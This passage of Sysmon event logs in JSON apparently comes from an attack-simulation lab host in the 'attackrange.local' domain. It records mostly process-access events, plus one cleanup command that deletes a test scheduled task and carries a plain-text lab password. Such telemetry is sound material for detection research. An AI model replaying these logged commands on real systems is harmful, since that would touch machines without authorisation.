l.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6108,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6109,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nSourceProcessId: 1092\r\nSourceThreadId: 4108\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-0010D0D10800}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF448A0F13)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","SourceProcessGUID":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","SourceProcessId":"1092","SourceThreadId":"4108","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-0010D0D10800}","TargetProcessId":"2792","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF448A0F13)","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6110,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-001077810800}\r\nSourceProcessId: 3824\r\nSourceThreadId: 4796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-0010D0D10800}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001077810800}","SourceProcessId":"3824","SourceThreadId":"4796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-0010D0D10800}","TargetProcessId":"2792","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6111,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.547\r\nProcessGuid: {E2A3D6B1-11DA-5F25-0000-00109AD20800}\r\nProcessId: 4812\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sctasks.exe\r\nCommandLine: SCHTASKS  /Delete /S localhost /RU DOMAIN\\user /RP At0micStrong /TN \"Atomic task\" /F  \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D8-5F25-0000-0020C7800800}\r\nLogonId: 0x880C7\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F\r\nParentProcessGuid: {E2A3D6B1-11DA-5F25-0000-0010D0D10800}\r\nParentProcessId: 2792\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"SCHTASKS /Delete /S localhost /RU DOMAIN\\user /RP At0micStrong /TN \"Atomic task\" /F >nul 2>&1\" ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.547","ProcessGuid":"{E2A3D6B1-11DA-5F25-0000-00109AD20800}","Image":"C:\\Windows\\System32\\schtasks.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Task Scheduler Configuration Tool","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"sctasks.exe","CommandLine":"SCHTASKS  /Delete /S localhost /RU DOMAIN\\user /RP At0micStrong /TN \"Atomic task\" /F  ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D8-5F25-0000-0020C7800800}","LogonId":"0x880c7","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F","ParentProcessGuid":"{E2A3D6B1-11DA-5F25-0000-0010D0D10800}","ParentProcessId":"2792","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"SCHTASKS /Delete /S localhost /RU DOMAIN\\user /RP At0micStrong /TN \"Atomic task\" /F &gt;nul 2&gt;&amp;1\" ","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6112,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-11DA-5F25-0000-0010D0D10800}\r\nSourceProcessId: 2792\r\nSourceThreadId: 5080\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-00109AD20800}\r\nTargetProcessId: 4812\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","SourceProcessGUID":"{E2A3D6B1-11DA-5F25-0000-0010D0D10800}","SourceProcessId":"2792","SourceThreadId":"5080","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-00109AD20800}","TargetProcessId":"4812","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6113,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-00109AD20800}\r\nTargetProcessId: 4812\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-00109AD20800}","TargetProcessId":"4812","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6114,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6115,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6116,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
